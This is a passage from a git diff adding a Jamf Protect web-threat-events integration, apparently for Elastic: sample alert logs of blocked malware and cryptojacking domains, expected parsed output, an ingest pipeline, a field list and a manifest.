Legg"},"device":{"deviceId":"3ab4d0f6-2fea-49d5-96e5-0ead0a910378","os":"MAC_OS 12.7.1","deviceName":"Mac (12.7.1)","userDeviceName":"C02RR5V5G8WN","externalId":"76952549-aa61-51f4-9bef-0eaed5484319"},"eventType":{"id":"305","description":"Risky Host/Domain - Cryptojacking","name":"ACCESS_CRYPTOJACKING_HOST"},"app":{},"destination":{"ip":"172.67.201.133","name":"jsecoin.com"},"source":{},"location":"GB","severity":6,"user":{"email":"ab8debf5-38bf-4a71-a7d3-0fca4b6c5a1b@9608556b-0c3a-4a9c-9b4a-d714d8a028a1.wnd","name":"76952549-aa61-51f4-9bef-0eaed5484319"},"eventUrl":"https://radar.wandera.com/security/events/detail/bbe5c381-0647-4a01-be29-691e7ed908dd.ACCESS_CRYPTOJACKING_HOST?createdUtcMs=1702331447929","action":"Blocked"}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log-expected.json new file mode 100644 index 00000000000..d2a05b2c012 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log-expected.json @@ -0,0 +1,384 @@ +{ + "expected": [ + { + "destination": { + "address": "ip", + "domain": "host", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "013b15c9-8f62-4bf1-948a-d82367af2a10", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Sideloaded App", + "severity": 6, + "start": "2020-01-30T17:47:41.767Z", + "url": "https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767" + }, + "file": { + "hash": { + "sha1": "16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2", + "sha256": "16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042" + }, + "name": "Books" + }, + "host": { + "geo": { + "country_iso_code": "gb" + }, + "hostname": "Apple iPhone 11", + "id": "09f81436-de17-441e-a631-0461252c629b", + "os": { + "full": "IOS 11.2.5" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "fb4567b6-4ee2-3c4c-abb9-4c78ec463b25" + }, + "rule": { + "description": "Sideloaded App", + "name": "SIDE_LOADED_APP_IN_INVENTORY" + }, + "source": { + "port": 3025 + }, + "user": { + "email": "user@mail.com", + "name": "John Doe" + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "f296bcf0-134a-4df4-8069-ef273fb8c11b", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Vulnerable O/S", + "severity": 10, + "start": "2023-11-24T05:46:08.934Z", + "url": "https://radar.wandera.com/security/events/detail/f296bcf0-134a-4df4-8069-ef273fb8c11b.OUTDATED_OS?createdUtcMs=1700804768934" + }, + "host": { + "hostname": "ryan’s MacBook Pro", + "id": "20bae216-4e47-415f-b16f-518d7aadb3dc", + "os": { + "full": "MAC_OS 13.5.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a0233aa8a1" + }, + "rule": { + "description": "Vulnerable O/S", + "name": "OUTDATED_OS" + }, + "user": { + "email": "john.doe@jamf.com", + "name": "testinguser" + } + }, + { + "destination": { + "address": "52.92.33.124", + "domain": "malware.threatops.co.uk" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2024-01-10T12:20:37.059Z", + "url": "https://radar.wandera.com/security/events/detail/8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599.ACCESS_BAD_HOST?createdUtcMs=1704889237059" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "VMAC-HKDV5R2L6", + "id": "32ce61c6-a7b7-400b-b3bb-d048464f47b2", + "os": { + "full": "UNKNOWN 14.0.0" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "b36f2900-bf35-4661-bd4f-21d66a1199b7" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd", + "name": "43220292-40a8-5b3b-b4ef-94e1adbb720d" + } + }, + { + "destination": { + "address": "89.238.73.97", + "domain": "eicar.org" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "6303f01e-f8fb-4a36-a339-95d721d9bb02", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2024-01-10T12:20:28.506Z", + "url": "https://radar.wandera.com/security/events/detail/6303f01e-f8fb-4a36-a339-95d721d9bb02.ACCESS_BAD_HOST?createdUtcMs=1704889228506" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "VMAC-HKDV5R2L6", + "id": "32ce61c6-a7b7-400b-b3bb-d048464f47b2", + "os": { + "full": "UNKNOWN 14.0.0" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "b36f2900-bf35-4661-bd4f-21d66a1199b7" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd", + "name": "43220292-40a8-5b3b-b4ef-94e1adbb720d" + } + }, + { + "destination": { + "address": "2a00:1828:1000:2497::2", + "domain": "secure.eicar.org" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "debd2e4b-9da1-454e-952d-18a00b42ffce", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2023-02-21T13:10:40.410Z", + "url": "https://radar.wandera.com/security/events/detail/debd2e4b-9da1-454e-952d-18a00b42ffce.ACCESS_BAD_HOST?createdUtcMs=1676985040410" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "darrow", + "id": "e9671102-5ccf-4e66-a6b3-b117ba257d5f", + "os": { + "full": "UNKNOWN 13.2.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "allen.golbig@jamfse.io", + "name": "Allen Golbig" + } + }, + { + "destination": { + "address": "18.154.219.62", + "domain": "sli.bidagy.com" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "0c925382-dceb-486e-82b4-2a75f259e15e", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2023-12-28T13:36:52.187Z", + "url": "https://radar.wandera.com/security/events/detail/0c925382-dceb-486e-82b4-2a75f259e15e.ACCESS_BAD_HOST?createdUtcMs=1703770612187" + }, + "host": { + "geo": { + "country_iso_code": "US" + }, + "hostname": "c244cb17-6af8-4a62-98b5-9e6f2d3f89dd", + "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c", + "os": { + "full": "IOS 17.2.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + }, + { + "destination": { + "address": "45.55.83.107", + "domain": "servedby.aqua-adserver.com" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "e5f479d7-5301-402d-b776-a099e6fab817", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2023-12-25T12:16:37.261Z", + "url": "https://radar.wandera.com/security/events/detail/e5f479d7-5301-402d-b776-a099e6fab817.ACCESS_BAD_HOST?createdUtcMs=1703506597261" + }, + "host": { + "geo": { + "country_iso_code": "US" + }, + "hostname": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4", + "id": "cd531c8a-26ed-419a-8fd4-f67702f40ad5", + "os": { + "full": "IOS 17.2" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + }, + { + "destination": { + "address": "172.67.201.133", + "domain": "jsecoin.com" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "bbe5c381-0647-4a01-be29-691e7ed908dd", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Cryptojacking", + "severity": 6, + "start": "2023-12-11T21:50:47.929Z", + "url": "https://radar.wandera.com/security/events/detail/bbe5c381-0647-4a01-be29-691e7ed908dd.ACCESS_CRYPTOJACKING_HOST?createdUtcMs=1702331447929" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "C02RR5V5G8WN", + "id": "3ab4d0f6-2fea-49d5-96e5-0ead0a910378", + "os": { + "full": "MAC_OS 12.7.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "description": "Risky Host/Domain - Cryptojacking", + "name": "ACCESS_CRYPTOJACKING_HOST" + }, + "user": { + "email": "ab8debf5-38bf-4a71-a7d3-0fca4b6c5a1b@9608556b-0c3a-4a9c-9b4a-d714d8a028a1.wnd", + "name": "76952549-aa61-51f4-9bef-0eaed5484319" + } + } + ] +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/web_threat_events/agent/stream/http_endpoint.yml.hbs new file mode 100644 index 00000000000..030c4a24f77 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/agent/stream/http_endpoint.yml.hbs @@ -0,0 +1,38 @@ +listen_address: {{listen_address}} +listen_port: {{listen_port}} +url: {{url}} +{{#if secret_header}} +secret.header: {{secret_header}} +{{/if}} +{{#if secret_value}} +secret.value: {{secret_value}} +{{/if}} +{{#if preserve_original_event}} +preserve_original_event: true +{{/if}} +{{#if preserve_duplicate_custom_fields}} +preserve_duplicate_custom_fields: true +{{/if}} +tags: +{{#if preserve_original_event}} +- preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} +- preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} +- {{tag}} +{{/each}} +{{#if content_type }} +content_type: {{ content_type }} +{{/if}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/web_threat_events/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..cda2efaabec --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,247 @@ +--- +description: Pipeline for parsing Jamf Protect Web Protection threat logs +processors: + - set: + field: ecs.version + value: '8.11.0' + - json: + field: message + target_field: jamf_protect.threat + if: ctx.message != null + - rename: + field: json + target_field: jamf_protect.threat + if: ctx.json != null + +########################## +## ECS Observer Mapping ## +########################## + - set: + field: observer.product + value: Jamf Protect + - set: + field: observer.vendor + value: Jamf + +####################### +## ECS Event Mapping ## +####################### + - set: + field: event.kind + value: alert + - set: + field: event.provider + value: Jamf Protect + - rename: + field: jamf_protect.threat.event.timestamp + target_field: event.start + if: ctx.jamf_protect?.threat?.event?.timestamp != null + - append: + field: event.category + value: host + - append: + field: event.category + value: malware + if: ctx.jamf_protect?.threat?.event?.eventType?.name == 'MALWARE' + - rename: + field: jamf_protect.threat.event.action + target_field: event.action + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.action != null + - set: + field: event.reason + value: '{{jamf_protect.threat.event.eventType.description}}' + if: ctx.jamf_protect?.threat?.event?.eventType?.description != null + # ignore_missing: true + - rename: + field: jamf_protect.threat.event.alertId + target_field: event.id + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.alertId != null + - rename: + field: jamf_protect.threat.event.severity + target_field: event.severity + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.severity != null + - rename: + field: jamf_protect.threat.event.eventUrl + target_field: event.url + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.eventUrl != null + + +####################### +## ECS Rule Mapping ## +####################### + - rename: + field: jamf_protect.threat.event.eventType.name + target_field: rule.name + if: ctx.jamf_protect?.threat?.event?.eventType?.name != null + ignore_missing: true + - set: + field: rule.description + value: '{{jamf_protect.threat.event.eventType.description}}' + if: ctx.jamf_protect?.threat?.event?.eventType?.description != null + # ignore_missing: true + - rename: + field: jamf_protect.threat.event.eventType.id.toString() + target_field: rule.id + if: ctx.jamf_protect?.threat?.event?.eventType?.id != null + ignore_missing: true + + +####################### +## ECS Host Mapping ## +####################### + - rename: + field: jamf_protect.threat.event.device.userDeviceName + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.device?.userDeviceName != null + - rename: + field: jamf_protect.threat.event.device.deviceName + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.device?.deviceName == null && ctx.jamf_protect?.threat?.event?.device?.userDeviceName != null + - rename: + field: jamf_protect.threat.event.device.deviceId + target_field: host.id + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.device?.deviceId != null + - rename: + field: jamf_protect.threat.event.device.os + target_field: host.os.full + if: ctx.jamf_protect?.threat?.event?.device?.os != null + ignore_missing: true + +######################## +## ECS User Mapping ## +######################## + + - rename: + field: jamf_protect.threat.event.user.name + target_field: user.name + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.user?.name != null + - rename: + field: jamf_protect.threat.event.user.email + target_field: user.email + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.user?.email != null + +######################## +## ECS GEO Mapping ## +######################## + - rename: + field: jamf_protect.threat.event.location + target_field: host.geo.country_iso_code + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.location != null + + +####################### +## ECS Destination Mapping ## +####################### + - rename: + field: jamf_protect.threat.event.destination.ip + target_field: destination.address + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.destination?.ip != null + - rename: + field: jamf_protect.threat.event.destination.name + target_field: destination.domain + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.destination?.name != null + - rename: + field: jamf_protect.threat.event.destination.port + target_field: destination.port + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.destination?.port != null + + +####################### +## ECS File Mapping ## +####################### + - rename: + field: jamf_protect.threat.event.app.name + target_field: file.name + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.app?.name != null + - rename: + field: jamf_protect.threat.event.app.sha1 + target_field: file.hash.sha1 + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.app?.sha1 != null + - rename: + field: jamf_protect.threat.event.app.sha256 + target_field: file.hash.sha256 + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.app?.sha256 != null + +####################### +## ECS Source Mapping ## +####################### + - rename: + field: jamf_protect.threat.event.source.ip + target_field: source.address + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.destination?.ip != null + - rename: + field: jamf_protect.threat.event.source.port + target_field: source.port + # ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.source?.port != null + +# ######################## +# # ECS Organization Mapping ## +# ######################## + - rename: + field: jamf_protect.threat.event.account.customerId + target_field: organization.id + ignore_missing: true + if: ctx.jamf_protect?.threat?.event?.account?.customerId != null + + + +######################## +# ECS Related Mapping ## +######################## + + +############# +## Cleanup ## +############# + - remove: + field: + - jamf_protect.threat + - jamf_protect + - message + ignore_missing: true + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + - script: + description: Drops null/empty values recursively. + lang: painless + source: + boolean dropEmptyFields(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/fields/base-fields.yml b/packages/jamf_protect/data_stream/web_threat_events/fields/base-fields.yml new file mode 100644 index 00000000000..9d98b4b0c22 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.dataset + type: constant_keyword + description: Name of the dataset. + value: jamf_protect.web-threat-events +- name: event.module + type: constant_keyword + description: Event module. + value: jamf_protect diff --git a/packages/jamf_protect/data_stream/web_threat_events/fields/ecs.yml b/packages/jamf_protect/data_stream/web_threat_events/fields/ecs.yml new file mode 100644 index 00000000000..ebc871aa483 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/fields/ecs.yml @@ -0,0 +1,284 @@ +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.created +- external: ecs + name: event.code +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.category +- external: ecs + name: event.id +- external: ecs + name: event.timezone +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: user.name +- external: ecs + name: user.domain +- external: ecs + name: user.email +- external: ecs + name: related.hosts +- external: ecs + name: related.hash +- external: ecs + name: process.args +- external: ecs + name: process.args_count +- external: ecs + name: process.command_line +- external: ecs + name: process.executable +- external: ecs + name: process.parent.pid +- external: ecs + name: process.real_group.id +- external: ecs + name: process.real_user.id +- external: ecs + name: process.user.id +- external: ecs + name: process.tty +- external: ecs + name: process.group_leader.pid +- external: ecs + name: process.exit_code +- external: ecs + name: process.executable +- external: ecs + name: process.name +- external: ecs + name: process.pid +- external: ecs + name: process.hash.md5 +- external: ecs + name: process.hash.sha1 +- external: ecs + name: process.hash.sha256 +- external: ecs + name: process.code_signature.signing_id +- external: ecs + name: process.code_signature.status +- external: ecs + name: process.code_signature.team_id +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: file.gid +- external: ecs + name: file.inode +- external: ecs + name: file.mode +- external: ecs + name: file.size +- external: ecs + name: file.uid +- external: ecs + name: file.code_signature.signing_id +- external: ecs + name: file.code_signature.status +- external: ecs + name: file.code_signature.team_id +- external: ecs + name: destination.address +- external: ecs + name: destination.as.number +- external: ecs + name: destination.as.organization.name +- external: ecs + name: destination.domain +- external: ecs + name: destination.geo.continent_name +- external: ecs + name: destination.geo.country_iso_code +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.country_name +- external: ecs + name: destination.geo.location +- external: ecs + name: destination.ip +- external: ecs + name: destination.port +- external: ecs + name: network.direction +- external: ecs + name: network.transport +- external: ecs + name: source.domain +- external: ecs + name: source.ip +- external: ecs + name: source.port +- external: ecs + name: tags +- external: ecs + name: threat.tactic.id +- external: ecs + name: threat.tactic.reference +- external: ecs + name: threat.tactic.name +- external: ecs + name: threat.technique.id +- external: ecs + name: threat.technique.name +- external: ecs + name: threat.technique.reference +- external: ecs + name: threat.enrichments +- external: ecs + name: threat.software.platforms +- external: ecs + name: container.image.tag +- external: ecs + name: container.runtime +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.duration +- external: ecs + name: event.end +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.provider +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.type +- external: ecs + name: file.extension +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.hash.sha512 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: log.file.path +- external: ecs + name: log.logger +- external: ecs + name: message +- external: ecs + name: observer.name +- external: ecs + name: observer.product +- external: ecs + name: observer.type +- external: ecs + name: observer.vendor +- external: ecs + name: process.command_line +- external: ecs + name: process.parent.pid +- external: ecs + name: process.parent.start +- external: ecs + name: process.pid +- external: ecs + name: process.start +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: rule.description +- external: ecs + name: rule.name +- external: ecs + name: rule.id +- external: ecs + name: tags +- external: ecs + name: threat.framework +- external: ecs + name: threat.technique.name +- external: ecs + name: user.domain +- external: ecs + name: user.id +- external: ecs + name: user.name +- external: ecs + name: group.id +- external: ecs + name: host.geo.country_iso_code +- external: ecs + name: group.name +- name: volume.file_system_type + type: keyword +- name: volume.bus_type + type: keyword +- name: volume.nt_name + type: keyword +- name: volume.product_id + type: keyword +- name: volume.product_name + type: keyword +- name: volume.removable + type: boolean +- name: volume.serial_number + type: keyword +- name: volume.size + type: long +- name: volume.vendor_id + type: keyword +- name: volume.vendor_name + type: keyword +- name: volume.writable + type: boolean +- name: organization.id + type: keyword diff --git a/packages/jamf_protect/data_stream/web_threat_events/manifest.yml b/packages/jamf_protect/data_stream/web_threat_events/manifest.yml new file mode 100644 index 00000000000..71a602f8469 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/manifest.yml @@ -0,0 +1,66 @@ +title: Receives Web Threat Events from Jamf Protect with Elastic Agent. +type: logs +streams: + - input: http_endpoint + template_path: http_endpoint.yml.hbs + title: Jamf Protect Web Threat Events + description: Receives Web Threat Events from Jamf Protect with Elastic Agent. + vars: + - name: listen_port + type: integer + title: Listen Port + description: The port number the listener binds to. + multi: false + required: true + show_user: true + default: 9552 + - name: url + type: text + title: URL + description: This option specifies which URL path to accept requests on. Defaults to /. + multi: false + required: false + show_user: false + default: / + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - jamf_protect-web-threat-events + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: true + title: Preserve duplicate custom fields + description: Preserve custom fields for all ECS mappings. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: content_type + type: text + title: Content types + multi: false + default: + - application/json;charset=UTF-8 + required: true + show_user: true + description: By default the input expects the incoming POST to include a Content-Type of application/json to try to enforce the incoming data to be valid JSON. In certain scenarios when the source of the request is not able to do that, it can be overwritten with another value or set to null. diff --git a/packages/jamf_protect/data_stream/web_threat_events/sample_event.json b/packages/jamf_protect/data_stream/web_threat_events/sample_event.json new file mode 100644 index 00000000000..44ac710863f --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/sample_event.json @@ -0,0 +1,61 @@ +{ + "destination": { + "address": "ip", + "domain": "host", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "013b15c9-8f62-4bf1-948a-d82367af2a10", + "kind": "alert", + "module": "jamf_protect", + "provider": "Jamf Protect", + "reason": "Sideloaded App", + "severity": 6, + "start": "2020-01-30T17:47:41.767Z", + "url": "https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767" + }, + "file": { + "hash": { + "sha1": "16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2", + "sha256": "16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042" + }, + "name": "Books" + }, + "host": { + "geo": { + "country_iso_code": "gb" + }, + "hostname": "Apple iPhone 11", + "id": "09f81436-de17-441e-a631-0461252c629b", + "os": { + "full": "IOS 11.2.5" + } + }, + "jamf_protect": {}, + "message": "{\"event\":{\"metadata\":{\"schemaVersion\":\"1.0\",\"vendor\":\"Jamf\",\"product\":\"Threat Events Stream\"},\"timestamp\":\"2020-01-30T17:47:41.767Z\",\"alertId\":\"013b15c9-8f62-4bf1-948a-d82367af2a10\",\"account\":{\"customerId\":\"fb4567b6-4ee2-3c4c-abb9-4c78ec463b25\",\"parentId\":\"7c302632-7ac4-4234-8ada-11d76feb3730\",\"name\":\"Customer\"},\"device\":{\"deviceId\":\"09f81436-de17-441e-a631-0461252c629b\",\"os\":\"IOS 11.2.5\",\"deviceName\":\"Apple iPhone 11 (11.2.5)\",\"userDeviceName\":\"Apple iPhone 11\",\"externalId\":\"5087dc0e-876c-4b0e-95ea-5b543476e0c4\"},\"eventType\":{\"id\":213,\"description\":\"Sideloaded App\",\"name\":\"SIDE_LOADED_APP_IN_INVENTORY\"},\"app\":{\"id\":\"com.apple.iBooks\",\"name\":\"Books\",\"version\":\"1.1\",\"sha1\":\"16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2\",\"sha256\":\"16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042\"},\"destination\":{\"name\":\"host\",\"ip\":\"ip\",\"port\":80},\"source\":{\"ip\":\"1.2.3.4\",\"port\":3025},\"location\":\"gb\",\"accessPoint\":\"AccessPoint\",\"accessPointBssid\":\"c6:9f:db:b1:73:5a\",\"severity\":6,\"user\":{\"email\":\"user@mail.com\",\"name\":\"John Doe\"},\"eventUrl\":\"https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767\",\"action\":\"Detected\"}}", + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "fb4567b6-4ee2-3c4c-abb9-4c78ec463b25" + }, + "rule": { + "description": "Sideloaded App", + "name": "SIDE_LOADED_APP_IN_INVENTORY" + }, + "source": { + "port": 3025 + }, + "user": { + "email": "user@mail.com", + "name": "John Doe" + } +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log new file mode 100644 index 00000000000..6ee4ff93cc1 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log @@ -0,0 +1,6 @@ +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-02-02T06:26:04.273Z","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"3453be41-0f2d-4d43-9ec2-a53f39fff93c","osType":"IOS"},"destination":{"ips":[]},"source":{"ip":"107.10.9.64"},"networkInterface":"WIFI","domain":"youtube","tld":"com","hostName":"s.youtube.com","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":101,"category":"Custom"},"blocked":false,"receiptTime":1706855164273,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic 